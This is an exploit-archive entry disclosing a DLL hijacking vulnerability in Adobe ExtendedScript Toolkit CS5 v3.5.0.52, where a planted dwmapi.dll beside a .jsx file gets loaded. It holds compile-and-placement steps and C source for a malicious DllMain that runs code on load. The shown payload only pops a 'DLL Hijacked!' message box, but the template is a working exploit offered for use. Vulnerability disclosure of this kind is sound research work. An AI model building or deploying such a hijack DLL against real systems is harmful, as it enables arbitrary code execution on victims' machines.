Lucene search
LiquidWorm1337DAY-ID-13854HistoryAug 25, 2010 - 12:00 a.m.
Adobe ExtendedScript Toolkit CS5 v3.5.0.52 DLL Hijacking (dwmapi.dll)
2010-08-2500:00:00
LiquidWorm
0day.today
16
Exploit for windows platform in category local exploits
=====================================================================
Adobe ExtendedScript Toolkit CS5 v3.5.0.52 DLL Hijacking (dwmapi.dll)
=====================================================================
/*
Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit
Vendor: Adobe Systems Inc.
Product Web Page: http://www.adobe.com
Affected Version: CS5 v3.5.0.52 ExtendScript 4.1.23 ScriptUI 5.1.37
Summary: The ExtendScript Toolkit (ESTK) 3.5.0 is a scripting utility
included with Adobe® Creative Suite CS5 and other Adobe applications.
The ESTK is used for creating, editing, and debugging JavaScript to be
used for scripting Adobe applications.
Desc: Adobe ExtendScript Toolkit CS5 suffers from a dll hijacking vulnerability
that enables the attacker to execute arbitrary code on a local level. The
vulnerable extension is .jsx thru dwmapi.dll library.
----
gcc -shared -o dwmapi.dll adobeest.c
Compile and rename to dwmapi.dll, create a file test.jsx and put both files
in same dir and execute.
----
Tested on Microsoft Windows XP Professional SP3 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
25.08.2010
*/
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}
# 0day.today [2018-04-09] #